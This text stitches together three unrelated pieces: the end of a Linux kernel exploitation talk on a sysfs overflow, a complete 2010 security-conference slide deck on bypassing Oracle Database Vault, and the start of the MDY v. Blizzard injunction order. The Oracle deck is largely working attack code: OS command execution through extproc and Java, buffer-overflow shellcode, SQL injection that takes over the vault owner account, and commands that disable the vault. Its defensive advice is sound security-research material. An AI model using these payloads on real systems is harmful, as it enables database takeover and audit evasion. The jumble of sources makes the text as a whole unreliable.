- Attacker-controlled contents - Attacker-controlled target • Length is no longer an issue - We can go over by a little ways without causing an immediate crash 36 Back to the content • It is difficult to write arbitrary content... - ...but easy to predict content. - str += sprintf(str, "%s %s %d %d 0x%4.4x 0x%4.4x %d %d %d\n" batostr(&bt_sk(sk)->src),...); • Usually looks like: - "00:00:00:00:00:00 00:00:00:00:00:00 2 0 0x0000 0x0000 672 0 1” repeated a bunch • well, as many times as we want... •What does this mean for us? 37 Back to the content • Data that looks like this must end up in the file structure. - "00:00:00:00:00:00 00:00:00:00:00:00 2 0 0x0000 0x0000 672 0 1” - Substring must end up in f_op! • What, exactly, can go in f_op? - more importantly, can this go in f_op? 38 Addressability • f_op is just a pointer into kernel’s A.S.! - Remember: kernel’s A.S. is superset of user’s A.S. - f_op can be pointer to user memory • Game plan - Map all substrings - ASCII representations should be valid pointers to f_op target. • “00:0” -> 0x30303A30 • “0:00” -> 0x303A3030 • “0 0:” -> 0x3020303A • ... 39 Now what? • We’re done, right? 40 f_u f_u f_path f_path f_op f_count f_flags ... f_mode str (hum de dum) 00:00:00:00:00:00 00:00:00:00:00:00 2 0 0x0000 0x0000 672 0 1 owner = NULL llseek = &attacker_ring0 read = &attacker_ring0 ... mapped in userspace! (mmap(), etc) some other data Now what? • Not so fast. - Real life, more likely: 41 f_u f_u f_path f_path f_op f_count f_flags f_mode str (hum de dum) 00:00:00:00:00:00 00:00:00:00:00:00 2 0 0x0000 0x0000 672 0 1 owner = NULL llseek = &attacker_ring0 read = &attacker_ring0 ... Two for three • Remember the three controls: - Attacker-controlled length - Attacker-controlled contents - Attacker-controlled target • Contents not controlled... but predicted. - We now have length and contents handled. 42 Let’s be buddies • How do we control the relative placement of frames? - (i.e., the target) • Physical frames allocated on Linux using “buddy allocator” - Really old best-fit allocator -- Markowitz, 1963 - Works really well with fragmentation-reducing strategies like SLAB - linux/mm/page_alloc.c • Run in god-damn fear. 43 Let’s be buddies • Buddy allocator has important features - Injects determinism and predictability into otherwise unordered frame allocation - Localizes size-one frames when able • Implementation details beyond scope of this talk - You gotta pick one, and I think SLAB is cooler 44 Localizer approach • Plan: - Fill up memory • Cause frames that would result in discontinuities to be paged to disk - Free memory to generate contiguous chunks - Allocate chunks of memory for struct files - Allocate buffer page • Opening sysfs file does this. This is critical! - Allocate more chunks of memory for struct files - Fire! 45 Localizer approach 46 free free free in use free in use free free free free in use free free free free free free in use free free free in use free free free free in use free free in use free free Initial configuration Localizer approach 47 ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours Allocate all memory for us Localizer approach 48 ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours Free and allocate to get contiguous phys chunks Localizer approach 49 ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours free free free free ours ours ours ours ours ours ours ours ours ours ours ours Release contiguous phys frames Localizer approach 50 ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours files files str files ours ours ours ours ours ours ours ours ours ours ours ours Set up files, buffer, files Localizer approach 51 ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours ours files files str files ours ours ours ours ours ours ours ours ours ours ours ours Pwn Three for three! • Remember the three controls: - Attacker-controlled length - Attacker-controlled contents - Attacker-controlled target • Target became controlled by deterministic memory permutation. • Result: system owned. 52 So close, guys 53 /* * The code works fine with PAGE_SIZE return but it's likely to * indicate truncated result or overflow in normal use cases. */ if (count >= (ssize_t)PAGE_SIZE) { print_symbol("fill_read_buffer: %s returned bad count\n", (unsigned long)ops->show); /* Try to struggle along */ count = PAGE_SIZE - 1; } Demo 54 Conclusions • Difficult-to-exploit bugs can be made easier by thinking about controlling your environment - Attacker-controlled length - Attacker-controlled contents - Attacker-controlled target • Just because it’s not easy, that doesn’t mean that it’s impossible! 55 Conclusions • Difficult-to-exploit bugs can be made easier by thinking about controlling your environment - Attacker-controlled length - Attacker-controlled contents - Attacker-controlled target • Just because it’s not easy, that doesn’t mean that it’s impossible! • Side conclusion: - Phone vendors: we will win. We have physical access; root on these phones will be ours. Please stop your crusade to keep me from using my own phone. 55 Questions? 56
Hacking and protecting Oracle Database Vault Esteban Martínez Fayó Argeniss (www.argeniss.com) July 2010 Agenda • Introduction to Oracle Database Vault  What is Oracle Database Vault, What changes introduce, Oracle Database Vault elements. • Attacks against Database Vault  Getting OS access  Impersonating MACSYS user  Special considerations for the SYS user o SQL Injection in SYS schema • Oracle Database Auditing and SYS user • Additional protection measures • Conclusions What is Oracle Database Vault? • It’s an add-on to Oracle Database. • Supported Oracle Database Releases: 9i R2, 10g R2, 11g R1 and 11g R2. • “Oracle Database Vault can prevent highly privileged users, including powerful application DBAs and others, from accessing sensitive applications and data in Oracle databases outside their authorized responsibilities”  The DBA no longer has unlimited access to database data.  Helps protect against the insider threat and address regulatory compliance needs such as Sarbanes-Oxley (SOX) and PCI . • The main goal of Oracle Database Vault is to provide Separation of Duty What changes with Database Vault? • Some initialization parameteres are changed to more secure values. • RECYCLE BIN feature is disabled • Revokes some privileges from default roles  DBA, IMP_FULL_DATABASE, EXECUTE_CATALOG_ROLE, SCHEDULER_ADMIN and PUBLIC. • Database audit is configured to include more actions, but auditing is not enabled.  Must issue ALTER SYSTEM SET AUDIT_TRAIL • SYS.AUD$ Table Moved to SYSTEM Schema. What changes with Database Vault? • SYS, SYSTEM and other schemas are protected as well as sensitive commands like ALTER USER. • Installing patches require to disable DBVault. • DBVault can be disabled with OS access.  On Windows: Under %ORACLE_HOME%\bin, delete or rename oradv[release_number].dll (example: oradv10.dll, oradv11.dll) file.  On Linux: make -f $ORACLE_HOME/rdbms/lib/ins_rdbms.mk dv_off $ORACLE_HOME/bin/relink oracle What changes with Database Vault? • In older releases:  OS authentication to the database is disabled.  Login “AS SYSDBA” blocked by default o SYS user can only log on “AS SYSOPER” o Some applications are incompatible with this: RMAN, Oracle RAC and some Oracle command line utilities. o Can be enabled with nosysdba=y parameter in orapwd program:  $ORACLE_HOME/bin/orapwd file=$ORACLE_HOME/dbs/orapworcl force=y nosysdba=n password=anypass Database Vault Elements • Realms  Functional grouping of database schemas and roles that must be secured. For example, related to accounting or sales.  You can use the realm to control the use of system privileges to specific accounts or roles. • Factors  A factor is a named variable or attribute, such as a user location, database IP address, or session user.  Can be used for activities such as authorizing database accounts to connect to the database or creating filtering logic to restrict the visibility and manageability of data. Database Vault Elements • Command rules  Allows to control how users can execute many of the SQL statements.  Work with rule sets to determine whether or not the statement is allowed. • Rule sets  Collection of rules that you can associate with a realm authorization, command rule, factor assignment, or secure application role.  The rule set evaluates to true or false based on the evaluation of each rule. • Secure application roles  Special Oracle role that can be enabled based on the evaluation of a rule set. Database Vault Elements • Database Vault Schemas (Locked accounts by default):  DVSYS: Contains Oracle Database Vault objects (tables, views, PL/SQL packages, etc). It's secured by the 'Oracle Database Vault' realm. It guards the schema against improper use of system privileges like SELECT ANY TABLE, CREATE ANY VIEW, or DROP ANY ….  DVF: Owner of DBMS_MACSEC_FUNCTION. Contains the functions that retrieve factor identities. • Roles provided by Oracle Database Vault:  DV_OWNER, DV_REALM_OWNER, and DV_REALM_RESOURCE  DV_ADMIN, DV_ACCTMGR, and DV_PUBLIC  DV_SECANALYST Database Vault Elements • Typical Database Vault users:  MACACCT o Account for administration of database accounts and profiles. o Roles granted: DV_ACCTMGR  MACADMIN o Account to serve as the access control administrator. o Roles granted: DV_ADMIN  MACREPORT o Account for running Oracle Database Vault reports. o Roles granted: DV_SECANALYST  MACSYS o Account that is the realm owner for the DVSYS realm. o Roles granted: DV_OWNER • Database Vault Documentation contains a guideline to secure it  Documents security considerations with: o PL/SQL Packages: UTL_FILE, DBMS_FILE_TRANSFER, LogMiner Packages o Privileges: CREATE ANY JOB, CREATE JOB, CREATE EXTERNAL JOB, ALTER SYSTEM and ALTER SESSION o The Recycle Bin o Java Stored Procedures and External C Callouts (< 11.2) o Trusted accounts: Oracle software owner OS account and SYSDBA users. Bypassing DB Vault • Attacks against Database Vault:  With OS access (from the database it may be possible to get OS access)  Creating and executing a procedure in MACSYS schema  SYS user can bypass DB Vault  Impersonating SYS using SQL Injection  Exploiting other vulnerabilities specific to DB Vault. Bypassing DB Vault OS access • OS access (as the Oracle software owner or root/Administrator) allows an attacker to:  Disable Database Vault  Overwrite SYS password (and enable SYSDBA connections if necessary). • Ways an attacker can get OS access:  External procedure call  Exploiting a buffer overflow vulnerability o Demo: SYS.KUPF$FILE_INT.GET_FULL_FILENAME.  Exploiting a SQL injection vulnerability and using one of the above methods  Java Stored Procedure  External Job; Creating a DIRECTORY object. OS access using ExtProc call - Attack • Requires CREATE LIBRARY and CREATE PROCEDURE privileges.  Default roles granted these privileges: DBA and IMP_FULL_DATABASE  Default users: SYSTEM, SYSMAN, DMSYS, MDSYS, ORDPLUGINS, ORDSYS • Create a library associated with an OS shared library containing a system() or exec() function.  Since Oracle 9.2 must be in $ORACLE_HOME/lib (Linux) or %ORACLE_HOME%\bin (Windows). o Configured using EXTPROC_DLLS environment variable in listener.ora  Linux: CREATE LIBRARY OS_EXEC AS '${ORACLE_HOME}/lib/libOsUtils.so'  Windows (10gR2): CREATE LIBRARY OS_EXEC AS '${ORACLE_HOME}\bin\msvcr71.dll'  Windows (11gR1 and 11gR2): CREATE LIBRARY OS_EXEC AS '${ORACLE_HOME}\bin\msvcrt.dll' OS access using ExtProc call - Attack • Create a procedure that calls to the system() or exec() functions: CREATE OR REPLACE PROCEDURE OS_EXEC2 (OS_CMD IN VARCHAR2) IS EXTERNAL NAME "system" LANGUAGE C LIBRARY OS_EXEC PARAMETERS (OS_CMD STRING); • To disable Database Vault:  Linux: BEGIN OS_EXEC2 ('make -f $ORACLE_HOME/rdbms/lib/ins_rdbms.mk dv_off'); OS_EXEC2 ('$ORACLE_HOME/bin/relink oracle'); END;  Windows: -- 10gR2: EXEC OS_EXEC2 ('ren %ORACLE_HOME%\bin\oradv10.dll oradv10_.dll'); -- 11gR1 and 11gR2: EXEC OS_EXEC2 ('ren %ORACLE_HOME%\bin\oradv11.dll oradv11_.dll'); OS access using ExtProc call - Defense • Avoid granting CREATE LIBRARY and CREATE PROCEDURE privileges to users.  Enable auditing any use of these privileges • Use EXTPROC_DLLS environment variable in listener.ora to restrict the libraries that can be loaded. OS access using Java - Attack • Two approaches  Using Oracle Java vulnerabilities discovered by David Litchfield (fixed in April 2010 CPU)  Using functionality available to privileged users. • Steps to get OS access using Oracle Java:  Grant Java privileges o With DBMS_JAVA.GRANT_PERMISSION (requires JAVA_ADMIN role) o With DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS (granted to PUBLIC by default except when April 2010 CPU applied)  Create Java Source and Java Stored procedure (requires CREATE PROCEDURE privilege) o This step can be avoided using DBMS_JAVA.RUNJAVA and oracle.aurora.util.Wrapper class (not available if April 2010 CPU is applied). OS access using Java (java_admin) - Attack • Grant Java privileges (requires JAVA_ADMIN privs): EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' ); OS access using Java (java_admin) - Attack • Create Java Source (requires CREATE PROCEDURE priv): CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS import java.lang.*; import java.io.*; public class ExecuteOS { public static void execOSCmd (String cmd) throws IOException, java.lang.InterruptedException { String[] strCmd = {"cmd.exe", "/c", cmd}; Process p = Runtime.getRuntime().exec(strCmd); p.waitFor(); } }; / OS access using Java (java_admin) - Attack • Create Java Stored procedure (requires CREATE PROCEDURE): CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2) AS LANGUAGE JAVA NAME 'ExecuteOS.execOSCmd (java.lang.String)'; / • Execute OS commands: EXEC PROC_EXECUTEOS ('C:\app\Administrator\product\11.2.0\dbhome_1\BIN\orapwd.exe file=C:\app\Administrator\product\11.2.0\dbhome_1\database\PWDorcl.ora force=y password=anypass nosysdba=n'); EXEC PROC_EXECUTEOS ('ren C:\app\Administrator\product\11.2.0\dbhome_1\BIN\oradv11.dll oradv11_.dll'); OS access using Java (java_admin) - Defense • Restrict JAVA_ADMIN role. • Remove Java support from Oracle database (if not needed). OS access using Java (no privs) - Attack • Grant Java privileges (no privs required): DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT 'GRANT','ONEUSER','SYS', 'java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / • Call oracle/aurora/util/Wrapper to execute OS commands: SELECT DBMS_JAVA_TEST.FUNCALL ('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'ren',' C:\\oracle\\product\\10.2.0\\db_1\BIN\\oradv10.dll','oradv10_.dll') FROM DUAL; OS access using Java (no privs) - Defense • Apply April 2010 CPU. • Oracle 11gR2 on Windows is not vulnerable. • Revoke privileges from users to execute DBMS_JVM_EXP_PERMS OS access using Buffer overflow - Attack • Requires EXECUTE privileges on a vulnerable procedure • DEMO: DIRPATH parameter of SYS.KUPF$FILE_INT.GET_FULL_FILENAME function is vulnerable to buffer overflow attacks  Patched in April 2008 Critical Patch Update OS access using Buffer overflow - Attack DECLARE OS_COMMAND VARCHAR2(504); RET_VALUE_X123 VARCHAR2(32767); P_DIRPATH VARCHAR2(32767); BEGIN -- Disable DB Vault: OS_COMMAND:='ren ..\bin\oradv10.dll oradv10_.dll'; -- Enable SYSDBA access and overwrite SYS password: -- OS_COMMAND:='..\bin\orapwd.exe file=..\dbs\orapworcl force=y nosysdba=n password=anypass'; P_DIRPATH := '' ||chr(54)||chr(141)||chr(67)||chr(19) /* 36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13] */ ||chr(80) /* 50 PUSH EAX */ ||chr(184)||chr(131)||chr(160)||chr(187)||chr(119)/* B8 83A0BB77 MOV EAX,msvcrt.system */ ||chr(255) || chr(208) /* FFD0 CALL EAX */ ||chr(184)||chr(31)||chr(179)||chr(188)||chr(119) /* B8 1FB3BC77 MOV EAX,msvcrt._endthread */ ||chr(255) || chr(208) /* FFD0 CALL EAX */ ||RPAD(OS_COMMAND || chr(38), 505) ||CHR(96) || CHR(221) || CHR (171) || CHR(118); /* EIP 0x76abdd60 - CALL EBX */ RET_VALUE_X123 := SYS.KUPF$FILE_INT.GET_FULL_FILENAME(DIRPATH => P_DIRPATH, NAME => 'B', EXTENSION => '', VERSION => ''); END; / OS access using Buffer overflow - Defense • Stay up-to-date with patches • Restrict EXECUTE permissions on Packages, reduce attack surface. • Strictly audit operations at the OS level. Impersonating MACSYS - Attack • Requires CREATE ANY PROCEDURE and EXECUTE ANY PROCEDURE privileges.  Default roles granted these privileges: DBA, IMP_FULL_DATABASE and DV_REALM_OWNER  Default users: SYSTEM and SYSMAN • Create a procedure in Database Owner schema (MACSYS) that execute as the owner (default behavior) • The procedure takes a string parameter that is the statement to be executed. Impersonating MACSYS - Attack • Example: CREATE OR REPLACE PROCEDURE MACSYS.EXECASMACSYS (STMT VARCHAR2) AS BEGIN EXECUTE IMMEDIATE STMT; END; • Execute the created stored procedure to run statements as the MACSYS user EXEC MACSYS.EXECASMACSYS ('ALTER USER MACSYS IDENTIFIED BY ANYPSW'); Impersonating MACSYS - Defense • Restrict CREATE ANY PROCEDURE and EXECUTE ANY PROCEDURE privileges • Consider to protect MACSYS schema with a Realm BEGIN DVSYS.DBMS_MACADM.CREATE_REALM('MACSYS Realm', '', 'NO', 1); DVSYS.DBMS_MACADM.ADD_OBJECT_TO_REALM('MACSYS Realm', 'MACSYS', '%', '%'); DVSYS.DBMS_MACADM.UPDATE_REALM('MACSYS Realm', 'Realm to protect the Database Vault Owner Schema', 'YES', 1); END; • SYS is owner of the 'Oracle Data Dictionary' Realm. • SYS has no administrator privilege over Database Vault (DV_OWNER role). • Can change Database Vault owner password in these ways:  Using SYS.DBMS_SYS_SQL.PARSE_AS_USER(): declare l_num number; l_int integer; begin select user_id into l_num from all_users where username = 'MACSYS'; l_int := sys.dbms_sys_sql.open_cursor(); sys.dbms_sys_sql.parse_as_user(l_int,'alter user MACSYS identified by "ANYPASS"',dbms_sql.native,l_num); sys.dbms_sys_sql.close_cursor(l_int); end; • It is important to protect the SYS account as if it was one of the DB Vault owner accounts. SYS user considerations SYS user considerations for older releases • Before SYS Can use SYS.KUPP$PROC.CHANGE_USER to impersonate any user, including the DB Vault owner. • Some DV Releases (like allows the SYS user to update system tables:  Can change DV owner password updating system tables directly: UPDATE sys.user$ SET password='C3B6F7BD55996DAA' WHERE name='MACSYS'  Can update data dictionary tables directly and the protection will not work (because there is no GRANT statement issued) : INSERT INTO sys.sysauth$ VALUES ((SELECT user# FROM user$ WHERE name = 'SYS'),(SELECT user# FROM user$ WHERE name = 'DV_OWNER'),999,NULL) SQL Injection • What about SQL Injection vulnerabilities in the SYS schema?  As we have seen SYS user can compromise DB Vault protections. • To protect from these SQL Injection attacks:  Apply Critical Patch Updates.  Revoke EXECUTE privileges for SYS owned packages. SQL Injection - Examples • Using vulnerability in DBMS_JAVA.SET_OUTPUT_TO_JAVA: SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA ('ID','oracle/aurora/rdbms/DbmsJava','SYS', 'writeOutputToFile','TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0,'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''declare l_num number; l_int integer; begin select user_id into l_num from all_users where username = ''''MACSYS''''; l_int := sys.dbms_sys_sql.open_cursor(); sys.dbms_sys_sql.parse_as_user(l_int,''''grant dv_owner to oneuser'''',dbms_sql.native,l_num); sys.dbms_sys_sql.close_cursor(l_int); end;''; END;', 'BEGIN NULL; END;') FROM DUAL; EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOW('NO_SUCH_SUBSCRIPTION', SYSDATE()); SQL Injection - Examples • Example where a function call can be injected. Fixed CPU-OCT-08 CREATE OR REPLACE FUNCTION ONEUSER.SQLI return varchar2 authid current_user as pragma autonomous_transaction; BEGIN execute immediate 'begin sys.kupp$proc.change_user(''MACSYS''); end;'; execute immediate 'alter user MACSYS identified by anypass'; commit; RETURN ''; END; / DECLARE P_WORKSPACE VARCHAR2(32767); BEGIN P_WORKSPACE := '''||ONEUSER.SQLI()||'''; SYS.LT.CREATEWORKSPACE(P_WORKSPACE, FALSE, '', FALSE); SYS.LT.REMOVEWORKSPACE(P_WORKSPACE, FALSE); END; / SQL Injection - Examples • Cursor Injection can’t be used this way: DECLARE P_WORKSPACE VARCHAR2(32767); MYC NUMBER; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC, 'declare pragma autonomous_transaction; begin sys.kupp$proc.change_user(''MACSYS''); execute immediate ''alter user macsys identified by anypass''; commit;end;',0); P_WORKSPACE := '''||(dbms_sql.execute('||myc||'))--'; SYS.LT.CREATEWORKSPACE(P_WORKSPACE, FALSE, '', FALSE); SYS.LT.REMOVEWORKSPACE(P_WORKSPACE, FALSE); END; / SQL Injection - Examples • Accessing objects protected by Realms exploiting vulnerability in SYS.LTADM (Fixed CPU-OCT-08): DECLARE P_INSTATE VARCHAR2(32767); BEGIN P_INSTATE := '''||to_char(dbms_xmlquery.getxml(''declare pragma autonomous_transaction; begin update hr.employees set salary=50000 where employee_id=205;commit;end;'',0))||'''; SYS.LTADM.COMPRESSSTATE(P_INSTATE, 1); END; / SQL Injection - Examples CREATE OR REPLACE FUNCTION "ONEDBA"."SQLI" return varchar2 authid current_user as pragma autonomous_transaction; BEGIN execute immediate 'begin insert into sys.sysauth$ values ((select user# from user$ where name = ''ONEDBA''),(select user# from user$ where name = ''DV_OWNER''),999,null); end;'; commit; return ''; END; / EXEC SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('EX01''||ONEDBA.sqli||'''); SQL Injection - Examples • Analyzing the vulnerable code we can see that it can be exploited without creating an auxiliary function (the SQL injection is inside a PL/SQL block instead of a DML sentence). SELECT PIECE, U.USERNAME, ST.SQL_TEXT FROM V$SQLAREA SA, V$SQLTEXT ST, DBA_USERS U WHERE SA.ADDRESS = ST.ADDRESS AND SA.HASH_VALUE = ST.HASH_VALUE AND SA.PARSING_USER_ID = U.USER_ID AND ST.HASH_VALUE IN (select HASH_VALUE from V$SQLTEXT where SQL_TEXT LIKE '%EX01%') ORDER BY ST.ADDRESS, ST.HASH_VALUE, ST.PIECE 0 SYS begin sys.dbms_application_info.set_module(module_name=>'DBMS_CD 1 SYS C_PUBLISH.ADVANCE',action_name=>'EX01'||ONEDBA.SQLI||'');end; SQL Injection - Examples EXEC SYS.DBMS_CDC_UTILITY.LOCK_CHANGE_SET('''); begin sys.kupp$proc.change_user(''MACSYS''); end; execute immediate ''alter user MACSYS identified by anypass''; commit; end;--'); • Results in the following code executed as SYS: begin sys.dbms_application_info.set_module(module_name=>'DBMS_CDC_PUBLI SH.ADVANCE',action_name=>''); begin sys.kupp$proc.change_user('MACSYS'); end; execute immediate 'alter user MACSYS identified by anypass'; commit; end;--');end; Vulnerabilities specific to Oracle DB Vault • NLS_LANGUAGE Realm protection bypass (Fixed)  Changing the NLS_LANGUAGE session parameter to anything different than AMERICAN disables Database Vault Realm protection for DDL commands. • Some issues pending to fix  Affecting Oracle Database Vault Administrator web console.  Allowing to compromise DB Vault from DV_ACCTMGR role. Vulnerabilities specific to Oracle DB Vault SQL> connect onedba/onedba Connected. SQL> drop table hr.jobs cascade constraints; drop table hr.jobs cascade constraints * ERROR at line 1: ORA-00604: error occurred at recursive SQL level 1 ORA-47401: Realm violation for drop table on HR.JOBS ORA-06512: at "DVSYS.AUTHORIZE_EVENT", line 55 ORA-06512: at line 13 SQL> alter session set NLS_LANGUAGE="LATIN AMERICAN SPANISH"; Session altered. SQL> drop table hr.jobs cascade constraints; Table dropped. Oracle Database Auditing and SYS user • SYS user is not audited in the same way than other users:  AUDIT_SYS_OPERATIONS init parameter must be TRUE.  All SQL statements issued in a SYSDBA/SYSOPER connection are audited with the SQL Text in OS audit trail. o The Auditing configuration done with AUDIT statement doesn’t have any effect on SYS auditing.  Statements executed inside stored procedures are NOT audited.  SYS.KUPP$PROC.CHANGE_USER (BECOME USER) is audited even if it’s used inside a SP.  SYS.DBMS_SYS_SQL.PARSE_AS_USER is not audited if used inside a SP. Oracle Database Auditing and SYS user • What about SQL injection running as SYS?  The vulnerable procedure execution is audited o Audit of SP executions is not commonly enabled. o It will appear just as a SP execution and the statements executed as the privileged (SYS) user will not be audited. o Only if the Extended auditing (with SQL Text) is enabled the statements can be seen as a string in the SP call parameters. Oracle Database Auditing and SYS user • What about SQL injection running as SYS?  If the SQL Injection exploit requires to create a function then this will also be audited. o There are some techniques that avoids the need to create a function. o Function can be created wrapped to make it more difficult to know what is doing, something like: create or replace procedure oneuser.sqli wrapped a000000 b2 abcd 7 37 6d VqEweimFLXnpdhTHG8WS4ZVL2V0wg5nnm7+fMr2ywFwWULgruDO4dCDXpXQruM Ay/tJeuPC4 MsuyUlyl0oEyMgj1NsJuO5Rxc3HYiKaJzbK1 / Additional protection measures • Be aware that some system privileges can lead to full database compromise:  BECOME USER  CREATE [ANY] LIBRARY  EXECUTE ANY PROCEDURE  CREATE ANY PROCEDURE  EXECUTE on SYS owned objects. o Default roles like SELECT_CATALOG_ROLE, EXECUTE_CATALOG_ROLE, DBA has excessive EXECUTE privileges. • SELECT u.name username, pm.name priv FROM sys.sysauth$ sa, sys.user$ u, sys.system_privilege_map pm WHERE privilege# in (-188, -189, -21, -140, -141, -144) AND u.user# = grantee# AND pm.privilege = sa.privilege# ORDER BY u.name • SELECT * FROM sys.system_privilege_map Additional protection measures • NEVER use default Oracle users or roles  Usually have more privileges than needed and can change from release to release.  Create your own users and grant only the required privileges through your own roles.  Exception: Database Vault default roles (like DV_OWNER and DV_ACCTMGR). • Change the External Job OS user  In Unix/Linux: Can be specified in $OH/rdbms/admin/externaljob.ora  In windows: Change the authentication user defined in the external job service • Follow the security considerations in Database Vault Documentation but be aware that it is not enough. Conclusions • The Separation of duty provided by Database Vault can be bypassed. • System privileges can lead to full DB compromise or privilege escalation  CREATE LIBRARY/PROCEDURE; CREATE/EXECUTE ANY PROCEDURE • Database Auditing can be bypassed by SYS user or exploiting SQL injection. Conclusions • Oracle should move components out of the SYS schema  There are some components that do not need to be in the SYS schema.  They are doing something in this direction: Oracle Workspace Manager was moved from SYS to WMSYS. o Accessed through DBMS_WM public synonym o Implemented in packages LT, LTADM, LTRIC. • Oracle Database Vault is improving its security and usability in new releases  More restrictions for SYS user.  More functionality and tools can be used with DV enabled. Documentation • Oracle documentation for Database Vault:  10.2: http://download.oracle.com/docs/cd/B19306_01/server.102/b25166/toc.htm  11.1: http://download.oracle.com/docs/cd/B28359_01/server.111/b31222/toc.htm  11.2: http://download.oracle.com/docs/cd/E11882_01/server.112/e10576/toc.htm END • Questions? • Thank You. • Contact: esteban>at<argeniss>dot<com
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 WO IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF ARIZONA MDY Industries, LLC, Plaintiff/Counterdefendant, vs. Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Defendants/Counterclaimants. _________________________________ Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Third-Party Plaintiffs, vs. Michael Donnelly, Third-Party Defendant. ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) No. CV-06-2555-PHX-DGC ORDER AND PERMANENT INJUNCTION This case concerns the World of Warcraft computer game (“WoW”) and a software program known as Glider that plays WoW for its owners while those owners are away from their computer keyboards. MDY Industries, Inc. (“MDY”), the owner and distributor of Glider, sought a declaratory judgment that Glider does not infringe rights owned by Blizzard Entertainment, Inc. and Vivendi Games, Inc. (collectively, “Blizzard”), the owners and distributors of WoW. Dkt. #5. Blizzard filed a counterclaim and a third-party complaint against Michael Donnelly, the founder of MDY. Blizzard asserted seven claims: tortious 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 2 - interference with contract, contributory copyright infringement, vicarious copyright infringement, violation of the Digital Millennium Copyright Act (“DMCA”), trademark infringement, unfair competition, and unjust enrichment. Dkt. #10. The Court granted in part the parties’ summary judgment motions. The Court held MDY liable to Blizzard for tortious interference with contract, contributory copyright infringement, and vicarious copyright infringement. The Court granted summary judgment to MDY on the portion of Blizzard’s claim based on the DMCA that applied to Blizzard’s game client software code. The Court also granted summary judgment in favor of MDY on Blizzard’s unfair competition claim. Dkt. #82. Blizzard filed a motion for a permanent injunction on its tortious interference and copyright infringement claims. Dkt. #84. The Court denied the motion without prejudice. Dkt. #91. Following this ruling, Blizzard dismissed its trademark infringement and unjust enrichment claims and the parties stipulated that Blizzard would recover $6,000,000 in damages from MDY on the tortious interference and copyright infringement claims if any one of those claims is affirmed on appeal. Dkt. ##94-95. The parties agreed that the Court should hold a bench trial to decide the remaining claims under the DMCA, whether Donnelly is personally liable to Blizzard, and whether Blizzard is entitled to a permanent injunction. Dkt. ##92, 96. The bench trial was held on January 8 and 9, 2009. Dkt. ##100-02. The Court issued an order setting forth its findings of fact and conclusions of law on January 28, 2009. The Court concluded that MDY is liable under the DMCA, that Donnelly is personally liable for MDY’s tortious interference, copyright infringement, and DMCA violations, and that Blizzard is entitled to a permanent injunction. Dkt. #108. As requested by the Court (see id. at 22), the parties have filed memoranda addressing three issues: (1) the scope of the injunction, (2) whether the injunction should be stayed pending appeal, and (3) what bond should be imposed for Blizzard’s protection pending appeal. Dkt. ##109, 111. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 3 - I. Scope of the Injunction. Injunctive relief “is historically ‘designed to deter, not punish[.]’” Rondeau v. Mosinee Paper Corp., 422 U.S. 49, 62 (1975) (citation omitted). In issuing a permanent injunction, “a district court should only include injunctive terms that have a common sense relationship to the needs of the specific case, and the conduct for which a defendant has been held liable.” MGM Studios, Inc. v. Grokster, Ltd., 518 F. Supp. 2d 1197, 1126-27 (C.D. Cal. 2007) (citing NLRB v. Express Publ’g Co., 312 U.S. 426, 435 (1941)). “‘[B]lanket injunctions to obey the law are disfavored.’” Id. at 1226 (citation omitted). MDY has been found liable for tortious interference with the contract between Blizzard and WoW users, contributory and vicarious infringement of Blizzard’s copyrights in WoW, and violations of the DMCA. See Dkt. ##82, 108. The Court will enjoin MDY from engaging in acts “which are the same type and class as [the] unlawful acts which the [C]ourt has found to have been committed” by MDY. Express Publ’g Co., 312 U.S. at 435; see Rondeau 422 U.S. at 62 (injunctive relief was designed “to permit the court ‘to mould each decree to the necessities of the particular case’”) (citation omitted); Aluminum Workers Int’l Union v. Consol. Aluminum Corp., 696 F.2d 437, 446 (6th Cir. 1982) (“the scope of relief should be strictly tailored to accomplish only that which the situation specifically requires”). To ensure that the injunctions are specifically tailored, separate injunctions are set forth at the end of this order for (1) the copyright and DMCA claims and (2) the tortious interference claim. II. Stay of Injunction Pending Appeal. MDY seeks a stay of the injunctions pending appeal. Dkt. #111. The Court has discretion to grant a stay pursuant to Rule 62(c) of the Federal Rules of Civil Procedure. Such a stay “is an extraordinary remedy that should be granted sparingly.” 